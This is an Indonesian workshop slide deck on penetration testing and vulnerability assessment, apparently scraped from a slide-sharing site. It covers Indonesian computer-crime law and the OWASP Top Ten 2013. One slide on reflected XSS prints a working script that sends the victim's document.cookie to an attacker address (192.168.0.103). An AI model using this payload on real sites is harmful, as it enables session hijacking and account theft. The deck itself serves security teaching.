27
Workshop 101 Penetration testing & Vulnerability assessment [email protected]

Workshop 101 - Penetration testing & Vulnerability Assessment

  • Upload
    dan-h

  • View
    329

  • Download
    6

Embed Size (px)

DESCRIPTION

- Penetration testing and Vulnerability assessment system using OpenVas. - Privilege escalation - Pivoting server - metasploit

Citation preview

Page 1: Workshop 101 - Penetration testing & Vulnerability Assessment

Workshop 101Penetration testing & Vulnerability assessment

[email protected]

Page 2: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

Penetration testing

Page 3: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

Penetration testing

– Wewenang sah– Pengendalian kerusakan– Tanggung jawab– Lingkup kerja– Masalah privasi– Tugas untuk memperingatkan

Page 4: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

UU ITE

Page 5: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

Pasal 30

• Sengaja mengakses komputer atau sistem elektronik tanpa ijin.

• Pidana 6 - 8 tahun• Denda 600jt - 800jt

Page 6: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

Pasal 32

• Sengaja dan tanpa ijin melakukan pemindahan, perusakan dan membuka informasi rahasia.

• Pidana 8 - 10 tahun penjara• Denda 2M - 5M

Page 7: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

Pasal 33

• Sengaja dan tanpa ijin melakukan tindakan apapun yang mengakibatkan sistem terganggu.

• Pidana 10 tahun• Denda 10M

Page 8: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

Pasal 35

• Sengaja dan tanpa ijin melakukan pemalsuan Dokumen elektronik agar seolah-olah data yang otentik.

• Pidana 12 tahun penjara • Denda 12 M

Page 9: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

Page 10: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

Penetration testing

• Scope• Information gathering• Target identification• Target enumeration• Vulnerability mapping

Page 11: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

Penetration testing

• Exploitation• Post Exploitation• Social Engineering

Page 12: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

The Open Web Application Security Project (OWASP)

• Komunitas terbuka yang didedikasikan untuk mengembangkan dan memelihara aplikasi yang dapat dipercaya.

• Misi OWASP adalah untuk membuat perangkat lunak keamanan.

• Lisensi Free Open Source.

Page 13: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

OWASP Top Ten

2013

A1 Injection

A2 Broken Authentication and Session Management

A3 Cross-Site Scripting (XSS)

A4 Insecure Direct Object References

A5 Security Misconfiguration

A6 Sensitive Data Exposure

A7 Missing Function Level Access Control

A8 Cross-Site Request Forgery (CSRF)

A9 Using Known Vulnerable Components

A10 Unvalidated Redirects and Forwards

Page 14: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

A1 - Injection

• Kelemahan injeksi terjadi ketika data yang tidak dipercaya dikirim ke interpreter sebagai bagian dari suatu perintah atau query.

• Serangan yang populer :– Database Injection– LDAP injection– OS command injection

Page 15: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

A2 - Broken Authentification and Session Management

• Aplikasi yang berhubungan dengan otentikasi dan manajemen sesi sering tidak diterapkan dengan benar.

Page 16: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

SESSION FIXATION

Page 17: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

A3 - Cross Site Scripting

• Kelemahan XSS terjadi ketika aplikasi mengambil data yang tidak dipercaya dan mengirimkannya ke browser web tanpa validasi yang tepat atau meloloskannya.

• Dibagi menjadi beberapa kategori, yang populer :– XSS Reflected– XSS Stored

Page 18: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

XSS Reflected

<script>var tmp = document.cookie; document.write('<img src="http://192.168.0.103/?'%2btmp%2b'"/>');</script>

Page 19: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

A4 - Insecure Direct Object Reference

• Pengembang mengekspos referensi ke sebuah obyek implementasi internal, seperti file, direktori, rekaman database, atau kunci, melalui URL atau bentuk parameter.

• Populer :– Relative Path Disclosure– Full Path Disclosure

Page 20: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

Full Path Disclosure

Page 21: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

A5 - Security Misconfiguration

• Celah ini muncul akibat dari kesalahan konfigurasi keamanan.

• Populer :– PHPMyadmin (tanpa password)– Firewall = Off– dan sebagainya

Page 22: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

A6 - Sensitif Data Exposure

• Banyak aplikasi web tidak melindungi data sensitif– kartu kredit– ID pajak– otentifikasi yang tidak benar.

Page 23: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

A7 - Missing Functional Access Control

• Sebagian besar aplikasi web memverifikasi tingkat hak akses sebelum user interface terlihat.

• Kesalahan dari pengembang menyebabkan halaman web dapat diakses tanpa memiliki hak akses.

Page 24: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

A8 - Cross Site Request Forgery

• Celah keamanan pada aplikasi web dengan cara mengeksploitasi suatu task dari sebuah Web dengan memanfaatkan Autentikasi yang dimiliki oleh target.

Page 25: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

A9 - Using Components with Known Vulnerabilities

• Komponen, seperti library, framework, dan modul perangkat lunak lain, hampir selalu berjalan dengan hak penuh.

• Jika komponen yang memiliki celah ini dimanfaatkan, serangan seperti itu dapat menyebabkan kehilangan data yang serius hingga server yang anda miliki diambil alih.

Page 26: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

A10 - Unvalidated Redirects and Forwards

• Meneruskan pengguna ke halaman web lain tetapi tanpa konfirmasi.

• Tanpa konfirmasi, user tidak sadar jika posisi terkini ada di web lain.

Page 27: Workshop 101 - Penetration testing & Vulnerability Assessment

Hat Secure | Workshop 101

Pentest Labs